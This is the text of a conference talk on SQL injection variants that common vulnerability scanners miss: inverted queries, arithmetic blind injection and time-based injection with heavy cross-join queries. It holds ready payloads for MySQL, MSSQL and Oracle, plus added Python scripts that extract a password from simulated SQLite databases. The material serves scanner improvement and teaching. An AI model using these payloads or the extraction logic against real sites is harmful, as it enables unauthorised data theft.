How ?¿$·& developers defeat the most famous web vulnerability scanners… or how to recognize old friends
Chema Alonso, Informática64
José Parada, Microsoft Ibérica
Agenda
1.- Introduction
2.- Inverted Queries
3.- Arithmetic Blind SQL Injection
4.- Time-Based Blind SQL Injection using Heavy Queries
5.- Conclusions
1.-Introduction
SQL Injection is still here among us
Web Application Security Consortium: Comparison
http://projects.webappsec.org/Web-Application-Security-Statistics
12,186 sites, 97,554 bugs
Need to Improve Automatic Scanning
• Manual testing is not always possible:
  – Time
  – Confidentiality
  – Money, money, money…
• New ways of recognizing old-fashioned vulnerabilities are needed to improve automatic scanning tools.
2.-Inverted Queries
Homers, how are they?
• Lazy
• Badly trained
• Poor experience in security stuff
• Don't like working
• Don't like computing
• Don't like coding
• Don't like you!
Flanders are Left-handed
Right

SELECT UID FROM USERS WHERE NAME='V_NAME' AND PASSWORD='V_PASSW';

Wrong?

SELECT UID FROM USERS WHERE 'V_NAME'=NAME AND 'V_PASSW'=PASSWORD;

Login Inverted Query

Select uid From users where 'v_name'=name and 'v_pass'=password
http://www.web.com/login.php?v_name=Robert&v_pass=Kubica' or '1'='1

Select uid From users where 'Robert'=name and 'Kubica' or '1'='1'=password -> FAIL

The classic payload fails against the inverted query: 'Kubica' is left dangling as a bare string, and '1'='1'=password compares the result of '1'='1' with the password column instead of producing an always-true condition.
Login Inverted SQL Injection: an example

Select uid From users where 'v_name'=name and 'v_pass'=password

http://www.web.com/login.php?v_name=Robert&v_pass='='' or '1'='1' or 'Kubica

Select uid From users where 'Robert'=name and ''='' or '1'='1' or 'Kubica'=password -> SUCCESS

The payload is built backwards: it closes the open quote first, adds the always-true conditions, and ends with an open string ('Kubica) that the query's own closing quote and column name complete.
Blind Attacks
• The attacker injects code but cannot access the data directly.
• However, the injection changes the behaviour of the web application.
• The attacker then looks for differences between true injections (1=1) and false injections (1=2) in the response pages to extract data.
  – Blind SQL Injection
  – Blind XPath Injection
  – Blind LDAP Injection
Blind SQL Injection Attacks
• The attacker injects:
  – "True where clauses"
  – "False where clauses"
  – Ex:
    • Program.php?id=1 and 1=1
    • Program.php?id=1 and 1=2
• The program does not return any visible data from the database, nor data in error messages.
• The attacker cannot see any data extracted from the database.
Blind SQL Injection Attacks
• The attacker analyzes the response pages looking for differences between the "True-Answer Page" and the "False-Answer Page":
  – Different hashes
  – Different HTML structure
  – Different patterns (keywords)
  – Different linear ASCII sums
  – "Different behaviour", for example response time
Blind SQL Injection Attacks
• If any difference exists, then:
  – The attacker can extract all information from the database
  – How? Using "booleanization"
• MySQL:
  – Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
    » "True-Answer Page" or "False-Answer Page"?
• MSSQL:
  – Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1)) from sysusers)
• Oracle:
  – Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1)) from all_users where rownum<=1)
Blind Inverted Query

Select product From products Where v_value=id;

http://www.web.com/products.php?v_value=2 and 1=1

Select product From products Where 2 and 1=1=id; -> FAIL

Since = binds tighter than AND, the engine reads 2 and 1=1=id as 2 AND ((1=1)=id), i.e. id=1: the "true" injection returns product 1 instead of product 2, so the true page differs from the normal page and the scanner misreads the result.

The MySQL case:
- 1 is True
- 1=1=1 -> True
- 1=1=(1+1-1)=abs(1)=1 -> True
- 2=2=2 -> False: 2=2 becomes True, then True=2 is evaluated; True equals 1, so 1=2 is False

Select product From products Where v_value=id;

http://www.web.com/products.php?v_value=1 and 1=1

Select product From products Where 1 and 1=1=id; -> SUCCESS (if there is an id=1)
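The two query shapes above, run for real against SQLite so the difference can be checked instead of read. This is an added example and not code from the slides; the table layout, the user and product rows and the function names are constructed for the demo. SQLite matches MySQL on the two behaviours the slides rely on: = is left-associative, so '1'='1'=password is (('1'='1')=password), and a bare string in a boolean position converts to 0.

```python
"""Normal ('Homer') and inverted ('Flanders') queries, simulated on SQLite."""
import sqlite3


def make_db():
    """Constructed sample data: two users, two products."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(uid INTEGER PRIMARY KEY, name TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Robert', 'Kubica'), (2, 'Felipe', 'Massa');
        CREATE TABLE products(id INTEGER PRIMARY KEY, product TEXT);
        INSERT INTO products VALUES (1, 'Product 1'), (2, 'Product 2');
    """)
    return conn


def run(conn, sql):
    """First column of every row, or the error text a verbose page would leak."""
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as exc:
        return f"ERROR: {exc}"


def login_homer(conn, v_name, v_pass):
    # Deliberately vulnerable: concatenation, normal ('right-handed') order.
    return run(conn, f"SELECT uid FROM users WHERE name='{v_name}' AND password='{v_pass}'")


def login_flanders(conn, v_name, v_pass):
    # Deliberately vulnerable: concatenation, inverted ('left-handed') order.
    return run(conn, f"SELECT uid FROM users WHERE '{v_name}'=name AND '{v_pass}'=password")


def login_fixed(conn, v_name, v_pass):
    # The fix is the same for both shapes: bind parameters, never concatenate.
    rows = conn.execute("SELECT uid FROM users WHERE name=? AND password=?", (v_name, v_pass))
    return [row[0] for row in rows]


def product_flanders(conn, v_value):
    # Blind numeric inverted query: WHERE v_value=id
    return run(conn, f"SELECT product FROM products WHERE {v_value}=id")


CLASSIC_PAYLOAD = "Kubica' or '1'='1"            # what most scanners send
INVERTED_PAYLOAD = "'='' or '1'='1' or 'Kubica"  # closes the quote first, ends in an open string


if __name__ == "__main__":
    db = make_db()
    print("homer    + classic :", login_homer(db, "Robert", CLASSIC_PAYLOAD))      # [1, 2]
    print("flanders + classic :", login_flanders(db, "Robert", CLASSIC_PAYLOAD))   # []
    print("flanders + inverted:", login_flanders(db, "Robert", INVERTED_PAYLOAD))  # [1, 2]
    print("fixed    + inverted:", login_fixed(db, "Robert", INVERTED_PAYLOAD))     # []
    # '2 and 1=1' is parsed as 2 AND ((1=1)=id), i.e. id=1, so the page changes:
    print("products 2 and 1=1 :", product_flanders(db, "2 and 1=1"))  # ['Product 1']
    print("products 1 and 1=1 :", product_flanders(db, "1 and 1=1"))  # ['Product 1']
```

Running it also shows that the rewritten payload fires against the normal query as well (password=''='' or '1'='1' or 'Kubica' is still true for every row), so a scanner that adds it to its payload list covers both developers at once.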
Web Scanner behaviors
• Acunetix
• Paros
• AppScan
• W3af
• Wapiti
• Proxy Strike
Screenshots: each scanner (Acunetix, AppScan, Paros, W3af, Wapiti) run against the "Homer" (normal query) and the "Flanders" (inverted query) login pages.
Demo
• W3af
• Wapiti
• Proxy Strike
Results

Table: detection results per scanner (Paros, AppScan, Acunetix, w3af, wapiti, Proxy Strike) for the Normal and the Inverted query, on MySQL and MS SQL Server, each with a Numeric and a String parameter. The cell values are not available in the text version of the slides.
In the end…
OUCH!!! Thank God for keeping me safe
Solutions?
• Concat string injection
• Arithmetic Blind SQL Injection
• Time-Based Blind SQL Injection
  – Delay functions
  – Heavy queries
3.- Arithmetic
What about these queries? How to detect/exploit this Blind SQL Injection vulnerability?
– The query forces the parameter to be numeric
– SELECT field FROM table WHERE id=abs(param)
– Ex:
  Get Param(ID)
  Select ….. Where att1=abs(ID)
  Select ….. Where att2=k1-ID
  Print response
• Neither AND nor OR operators can be used.
• Boolean logic has to be built with arithmetic operations.
Arithmetic Blind SQL Injection
• Divide by zero (David Litchfield)
  – Id=A+(1/(ASCII(B)-C))
    • A -> Param value originally used in the query.
    • B -> Value we are searching for, e.g. Substring(passwd,1,1)
    • C -> Counter [0..255]
  – TRUE: when ASCII(B)=C, the DB generates a divide-by-zero exception.
Arithmetic Blind SQL Injection
• Sums and subtractions
  – Id=A+ASCII(B)-C
    • A -> Param value originally used in the query.
    • B -> Value we are searching for, e.g. Substring(passwd,1,1)
    • C -> Counter [0..255]
  – When ASCII(B)=C, the response page of id=A+ASCII(B)-C is the same as the one for id=A.
Arithmetic Blind SQL Injection
• Value type overflow
  – Id=A+((C/ASCII(B))*(K))
    • A -> Param value originally used in the query.
    • B -> Value we are searching for, e.g. Substring(passwd,1,1)
    • C -> Counter [0..255]
    • K -> Value that overflows the type defined for A (e.g. if A is an integer, K=2^32)
  – When C/ASCII(B)==1, K*1 overflows the data type.
  – Note that in engines with integer division (SQL Server, for instance) C/ASCII(B) is 0 while C<ASCII(B) and at least 1 from C=ASCII(B) onwards, so when C is scanned upwards the first counter that triggers the overflow is the value being searched for.
Demo:
• Divide by zero
• Sums and subtractions
• Integer overflow
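The divide-by-zero and sums-and-subtractions oracles above, carried through to a full extraction against a numeric-only parameter. This is an added example and not code from the slides; the products.php page, the abs() query, the table rows and the admin password are constructed for the demo. It runs on SQLite, which forces two substitutions that are stated here as assumptions of the simulation: ASCII() is spelled unicode(), and 0/0 yields NULL instead of raising, so the "exception" shows up as an empty page rather than an error page. The type-overflow variant is left out because SQLite silently promotes an overflowing integer to REAL.

```python
"""Arithmetic Blind SQL Injection (no AND/OR) against WHERE id=abs(<param>), on SQLite."""
import sqlite3

SECRET = "s3cret!"                                               # constructed sample data
SECRET_EXPR = "(SELECT password FROM users WHERE name='admin')"  # the B the attacker wants


def make_app():
    """Build the vulnerable page as a function: id_param -> list of product names."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (1, 'Widget'), (2, 'Gadget'), (3, 'Gizmo');
        CREATE TABLE users(uid INTEGER PRIMARY KEY, name TEXT, password TEXT);
    """)
    conn.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET,))

    def products_page(id_param):
        # Deliberately vulnerable: concatenated, but wrapped in abs(), so the
        # payload has to stay a numeric expression and AND/OR are useless.
        sql = f"SELECT name FROM products WHERE id=abs({id_param})"
        try:
            return [row[0] for row in conn.execute(sql)]
        except sqlite3.Error as exc:
            return [f"error: {exc}"]
    return products_page


def sums_oracle(page, a):
    """id = A + B - C: the page equals the baseline page only when B = C.
    abs() makes C = B and C = B + 2 both give id = A, so counters are scanned upwards."""
    baseline = page(a)
    return (lambda b: f"{a}+{b}-{{c}}"), (lambda p: p == baseline)


def div_zero_oracle(page, a):
    """id = A + 0/(B - C): the division fails only when B = C. MSSQL/Oracle raise a
    divide-by-zero error; SQLite returns NULL, abs(NULL) matches no row, page is empty.
    Numerator 0 keeps every non-matching counter exactly at id = A (with 1/(B-C) the
    two counters next to B would shift the id by one and look like a hit)."""
    return (lambda b: f"{a}+0/({b}-{{c}})"), (lambda p: p == [])


def first_counter(page, template, matches, limit=256):
    """Lowest C in [0, limit) whose response satisfies the oracle, i.e. C = B."""
    for c in range(limit):
        if matches(page(template.format(c=c))):
            return c
    raise ValueError("no counter matched; wrong expression or oracle")


def extract(page, make_oracle, a=1, expr=SECRET_EXPR):
    """Booleanize expr character by character using only +, - and /."""
    template, matches = make_oracle(page, a)
    length = first_counter(page, template(f"length({expr})"), matches, limit=65)
    chars = []
    for pos in range(1, length + 1):
        b = f"unicode(substr({expr},{pos},1))"  # SQLite's ASCII(SUBSTRING(...))
        chars.append(chr(first_counter(page, template(b), matches)))
    return "".join(chars)


if __name__ == "__main__":
    app = make_app()
    print(extract(app, sums_oracle))      # s3cret!
    print(extract(app, div_zero_oracle))  # s3cret!
```

Both oracles cost up to 256 requests per character because they test for equality; unlike the 100>ASCII(...) booleanization of the earlier slides there is no comparison operator available, so no binary search.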
Conclusions
• Arithmetic Blind SQL Injection allows binary logic to be built without "AND" and "OR".
  – It detects bugs in this kind of query…
  – …and also in inverted queries where a numeric value is used.
• Almost none of the vulnerability scanners use this method.
4.-Time-based Blind SQL Injection using heavy queries
Time-Based Blind SQL Injection
• In scenarios with no differences between the "True-Answer Page" and the "False-Answer Page", time delays can be used.
• The injection forces a delay in the response page when the injected condition is True.
  – Delay functions:
    • SQL Server: waitfor
    • Oracle: dbms_lock.sleep
    • MySQL: sleep or the Benchmark function
    • Postgres: pg_sleep
  – Ex:
    • ; if (exists(select * from users)) waitfor delay '0:0:5'
Time-Based Blind SQL Injection
What about DBs without delay functions, i.e.:
  – Oracle connections without PL/SQL injection
  – MS Access
  – DB2
Can we still exploit a Time-Based Blind SQL Injection?
"Where-Clause" execution order

Select "whatever" From whatever Where condition1 and condition2
- Condition1 lasts 10 seconds
- Condition2 lasts 100 seconds
Which condition should be executed first?

The heavy condition first

Condition2 (100 sec)   Condition1 (10 sec)   Condition2 & Condition1   Response Time
TRUE                   FALSE                 FALSE                     110 sec
TRUE                   TRUE                  TRUE                      110 sec
FALSE                  Not evaluated         FALSE                     100 sec

The engine always pays for the heavy condition and only the light one is skipped, so a True and a False answer differ by just 10 seconds.

The light condition first

Condition1 (10 sec)   Condition2 (100 sec)   Condition1 & Condition2   Response Time
TRUE                  FALSE                  FALSE                     110 sec
TRUE                  TRUE                   TRUE                      110 sec
FALSE                 Not evaluated          FALSE                     10 sec

A False light condition short-circuits the AND and the heavy condition is never evaluated: True and False answers now differ by 100 seconds.
Time-Based Blind SQL Injection using Heavy Queries
• The attacker can exploit the injection by delaying the "True-Answer Page" with a heavy query.
• It depends on how the database engine evaluates the where clauses of the query.
• There are two types of database engine:
  – Databases without an optimization process
  – Databases with an optimization process
Time-Based Blind SQL Injection using Heavy Queries
• The attacker can inject a heavy cross-join condition to delay the response page in True injections.
• The cross-join injection must be heavier than the other condition.
• The attacker only has to know or guess the name of a table the database user can SELECT from.
• Example in MSSQL:
  – Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers AS sys2, sysusers AS sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
  – 300 is above any ASCII value, so this probe is always True and shows the full delay; for the extraction the 300 is replaced by the booleanization counter.
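The heavy-query technique end to end, as an added example that is not code from the slides or from the Marathon tool. It assumes a products.php?id=<param> page that concatenates the parameter into SELECT name FROM products WHERE id=<param>, and a table name (users) the attacker has guessed; the rows and the admin password are constructed. It runs on SQLite and, instead of a stopwatch, measures the engine's work deterministically with sqlite3's progress handler (one tick per 100 VDBE opcodes), so the run is reproducible; the attacker-side logic is the same as timing the HTTP response. SQLite short-circuits the AND terms left to right, so the light condition is placed first and the heavy cross join second, as in the "light condition first" table above; a cost-based optimizer may reorder the terms, which is why the join has to be heavy enough to dominate in any case.

```python
"""Time-Based Blind SQL Injection with a heavy cross join, simulated on SQLite."""
import sqlite3

SECRET = "m4rath0n"                                               # constructed sample data
SECRET_EXPR = "(SELECT password FROM users WHERE name='admin')"  # what we want to read
# Guessed table, self-joined three times: 40 rows -> 64,000 rows to count.
HEAVY = "(SELECT count(*) FROM users u1, users u2, users u3)>0"


class VulnerableApp:
    """Simulates the page; returns (response, work), work standing in for seconds."""

    def __init__(self, n_users=40):
        self.conn = sqlite3.connect(":memory:")
        self.conn.executescript("""
            CREATE TABLE users(uid INTEGER PRIMARY KEY, name TEXT, password TEXT);
            CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT);
            INSERT INTO products VALUES (1, 'Widget');
        """)
        self.conn.execute("INSERT INTO users VALUES (1, 'admin', ?)", (SECRET,))
        self.conn.executemany("INSERT INTO users VALUES (?, ?, 'x')",
                              [(i, f"user{i}") for i in range(2, n_users + 1)])
        self.ticks = 0
        self.conn.set_progress_handler(self._tick, 100)  # called every 100 opcodes

    def _tick(self):
        self.ticks += 1
        return 0  # a non-zero return would abort the running statement

    def products(self, id_param):
        self.ticks = 0
        sql = f"SELECT name FROM products WHERE id={id_param}"  # deliberately injectable
        try:
            page = [row[0] for row in self.conn.execute(sql)]
        except sqlite3.Error:
            page = ["error"]
        return page, self.ticks


def payload(condition):
    """True condition -> the join runs and the page is slow; False -> skipped, fast."""
    return f"1 and ({condition}) and {HEAVY}"


def calibrate(app):
    """Known-false and known-true injections fix the fast/slow decision threshold."""
    _, fast = app.products(payload("1=2"))
    _, slow = app.products(payload("1=1"))
    if slow <= fast:
        raise RuntimeError("heavy query is not heavy enough to tell True from False")
    return (fast + slow) // 2


def ask(app, threshold, condition):
    _, work = app.products(payload(condition))
    return work > threshold


def search(app, threshold, value_expr, lo, hi):
    """Binary search the integer value of value_expr in [lo, hi] (about log2 requests)."""
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(app, threshold, f"{value_expr}>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract(app, expr=SECRET_EXPR):
    """Recover expr: its length first, then each character code (printable ASCII)."""
    threshold = calibrate(app)
    length = search(app, threshold, f"length({expr})", 0, 64)
    return "".join(chr(search(app, threshold, f"unicode(substr({expr},{i},1))", 32, 126))
                   for i in range(1, length + 1))


if __name__ == "__main__":
    app = VulnerableApp()
    print("fast/slow ticks:", app.products(payload("1=2"))[1], app.products(payload("1=1"))[1])
    print("extracted:", extract(app))  # m4rath0n
```

Against a live target the calibration step is the important one: the fast and slow samples should be taken several times and the threshold set between their worst cases, since network jitter plays the role the deterministic tick count hides here.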
"Default" tables to construct a heavy query
– Microsoft SQL Server
  • sysusers
– Oracle
  • all_users
– MySQL (version 5)
  • information_schema.columns
– Microsoft Access
  • MSysAccessObjects (97 & 2000 versions)
  • MSysAccessStorage (2003 & 2007)
"Default" tables to construct a heavy query
• …or whatever you can guess
  – Clients
  – Customers
  – News
  – Logins
  – Users
  – Providers
  – …
  Use your imagination…
Ex 1: MS SQL Server: the query takes 14 seconds -> True-Answer; 1 second -> False-Answer
Ex 2: Oracle: the query takes 22 seconds -> True-Answer; 1 second -> False-Answer
Ex 3: Access 2007: the query takes 39 seconds -> True-Answer; 1 second -> False-Answer
Marathon Tool
• Automates Time-Based Blind SQL Injection attacks using heavy queries in SQL Server, MySQL, MS Access and Oracle databases.
• Schema extraction from known databases
• Extracts data using heavy queries no matter which database engine is behind (without schema)
• Developed in .NET
• Source code available
• http://www.codeplex.com/marathontool
Demo: Marathon Tool
5.- Conclusions
The real world has plenty of kinds of developers…
References
• Inverted SQL queries (Spanish): http://elladodelmal.blogspot.com/2009/09/inverted-sql-queries-ii-de-ii.html
• Arithmetic Blind SQL Injection (Spanish): http://elladodelmal.blogspot.com/2009/07/arithmetic-blind-sql-injection-i-de-ii.html
• Time-Based Blind SQL Injection Using Heavy Queries & Marathon Tool: http://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
• Marathon Tool: http://www.codeplex.com/marathontool
• Connection String Attacks (Spanish): http://www.slideshare.net/chemai64/connection-string-parameter-pollution
Don't complain about your job!!